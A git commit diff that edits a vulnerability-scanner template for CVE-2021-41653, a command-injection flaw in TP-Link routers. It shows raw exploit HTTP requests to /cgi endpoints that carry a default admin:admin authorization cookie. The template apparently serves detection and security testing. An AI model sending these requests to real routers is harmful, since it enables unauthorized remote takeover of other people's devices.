Update CVE-2021-41653.yaml
parent
3dd0c78fff
commit
0b82e570d1
|
@ -8,21 +8,18 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://k4m1ll0.com/cve-2021-41653.html
|
- https://k4m1ll0.com/cve-2021-41653.html
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
|
||||||
tags: cve,cve2021,tplink,rce
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.80
|
cvss-score: 9.80
|
||||||
cve-id: CVE-2021-41653
|
cve-id: CVE-2021-41653
|
||||||
cwe-id: CWE-94
|
cwe-id: CWE-94
|
||||||
|
tags: cve,cve2021,tplink,rce,router
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /cgi?2 HTTP/1.1
|
POST /cgi?2 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept-Encoding: gzip, deflate
|
|
||||||
Accept: */*
|
|
||||||
Connection: keep-alive
|
|
||||||
Content-Type: text/plain
|
Content-Type: text/plain
|
||||||
Referer: http://{{Hostname}}/mainFrame.htm
|
Referer: http://{{Hostname}}/mainFrame.htm
|
||||||
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
|
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
|
||||||
|
@ -35,11 +32,9 @@ requests:
|
||||||
X_TP_ConnName=ewan_ipoe_d
|
X_TP_ConnName=ewan_ipoe_d
|
||||||
diagnosticsState=Requested
|
diagnosticsState=Requested
|
||||||
|
|
||||||
|
- |
|
||||||
POST /cgi?7 HTTP/1.1
|
POST /cgi?7 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept-Encoding: gzip, deflate
|
|
||||||
Accept: */*
|
|
||||||
Connection: keep-alive
|
|
||||||
Content-Type: text/plain
|
Content-Type: text/plain
|
||||||
Referer: http://{{Hostname}}/mainFrame.htm
|
Referer: http://{{Hostname}}/mainFrame.htm
|
||||||
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
|
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
|
||||||
|
|
Loading…
Reference in New Issue